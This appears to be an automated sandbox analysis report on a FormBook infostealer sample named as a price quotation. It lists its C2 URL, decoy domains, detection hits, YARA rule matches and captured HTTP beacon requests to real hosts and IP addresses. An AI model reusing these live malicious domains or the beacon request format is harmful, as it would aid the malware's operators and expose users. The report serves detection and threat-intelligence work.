Malware Configuration Extractor: FormBook {"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}

Multi AV Scanner detection for submitted file

Show sources

Source: PRICE_REQUEST_QUOTATION.exe	Virustotal: Detection: 34%			Perma Link
Source: PRICE_REQUEST_QUOTATION.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll

ReversingLabs: Detection: 13%

Machine Learning detection for sample

Show sources

Source: PRICE_REQUEST_QUOTATION.exe

Joe Sandbox ML: detected

Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.wscript.exe.c28870.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.wscript.exe.516796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: PRICE_REQUEST_QUOTATION.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source:	Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00405EC2 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00402671 FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe	Network Connect: 154.208.173.139 80
Source: C:\Windows\explorer.exe	Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe	Network Connect: 109.106.246.165 80
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe	Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe	Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe	Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe	Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe	Domain query: www.patrickandmaxine.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.nudesalon.digital/rgoe/

Source: Joe Sandbox View

ASN Name: CNSERVERSUS CNSERVERSUS

Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.patrickandmaxine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.nailsestetic.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.futurodr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.babeshotnud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: PRICE_REQUEST_QUOTATION.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PRICE_REQUEST_QUOTATION.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	String found in binary or memory: http://survey-smiles.com
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	String found in binary or memory: https://bitninja.io

Source: unknown

DNS traffic detected: queries for: www.appleluis.host

Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.patrickandmaxine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.nailsestetic.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.futurodr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.babeshotnud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000002.273624416.000000000069A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: PRICE_REQUEST_QUOTATION.exe

Source: PRICE_REQUEST_QUOTATION.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
